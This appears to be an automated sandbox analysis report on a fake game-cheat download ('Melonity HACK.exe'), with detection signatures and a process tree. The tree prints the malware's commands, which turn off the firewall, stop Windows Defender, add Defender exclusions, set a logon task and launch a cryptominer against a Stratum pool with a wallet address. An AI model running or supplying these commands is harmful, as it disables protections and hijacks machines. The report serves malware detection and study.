Analysis
-
max time kernel
88s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
19-05-2022 20:02
General
-
Target
https://oxy.name/d/Jmxf
Score
10/10
Malware Config
Signatures
-
Windows security bypass 2 TTPs
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Downloads MZ/PE file
-
Executes dropped EXE 24 IoCs
-
Modifies Windows Firewall 1 TTPs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 34 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 18 IoCs
-
Modifies registry class 6 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
-
Suspicious use of FindShellTrayWindow 44 IoCs
-
Suspicious use of SendNotifyMessage 32 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://oxy.name/d/Jmxf1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa05ec4f50,0x7ffa05ec4f60,0x7ffa05ec4f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2008 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4320 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5240 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5244 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4376 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3576 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6388 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4940 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6020 /prefetch:82⤵
-
C:\Users\Admin\Downloads\Melonity HACK.exe"C:\Users\Admin\Downloads\Melonity HACK.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"4⤵
-
C:\ProgramData\Defender\ac1.exeC:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\ProgramData\Defender\u.exe"C:\ProgramData\Defender\u.exe"3⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"3⤵
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\d1.exe4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "4⤵
-
C:\Windows\SysWOW64\netsh.exeNetSh Advfirewall set allprofiles state off5⤵
-
C:\Windows\SysWOW64\net.exenet stop windefend5⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop windefend6⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f5⤵
- Creates scheduled task(s)
-
C:\ProgramData\Defender\ac.exeC:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\ProgramData\Defender\min.exe"C:\ProgramData\Defender\min.exe"4⤵
- Executes dropped EXE
-
C:\ProgramData\Defender\Start.exeC:\ProgramData\Defender\Start.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9A9A.tmp\9A9B.tmp\9A9C.bat C:\ProgramData\Defender\Start.exe"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\system32\timeout.exeTIMEOUT /t 107⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps19⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ri0px40l\ri0px40l.cmdline"10⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA74.tmp" "c:\Users\Admin\AppData\Local\Temp\ri0px40l\CSCAB1027E5856E44C4BC98767FEC61198B.TMP"11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"10⤵
-
C:\ProgramData\Defender\Windows Protection.exe"C:\ProgramData\Defender\Windows Protection.exe"11⤵
-
C:\ProgramData\Defender\Windows Process.exe"C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x11⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
- Executes dropped EXE
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Executes dropped EXE
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\k.vbs"10⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\k.bat" "11⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Protection.exe"12⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /FI "imagename eq Windows Process.exe"12⤵
- Kills process with taskkill
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"10⤵
-
C:\ProgramData\Defender\Windows Protection.exe"C:\ProgramData\Defender\Windows Protection.exe"11⤵
-
C:\ProgramData\Defender\Windows Process.exe"C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RXuishujdXgfbAfeM6NYK1KsikNFPDHh7a.x11⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"8⤵
-
C:\ProgramData\Task Host\svchost.exe"C:\ProgramData\Task Host\svchost.exe"7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C515.tmp\C516.tmp\C517.bat "C:\ProgramData\Task Host\svchost.exe""8⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6828 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7040 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6928 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7164 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7200 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6984 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6404 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,3197214731028535143,9419818738760400249,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\Desktop\Melonity HACK.exe"C:\Users\Admin\Desktop\Melonity HACK.exe"1⤵
- Modifies registry class
-
C:\ProgramData\Defender\ab.exeC:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"3⤵
- Checks computer location settings
-
C:\ProgramData\Defender\d.exe"C:\ProgramData\Defender\d.exe" 61 C:\ProgramData\Defender\dd.bat4⤵
- Executes dropped EXE
-
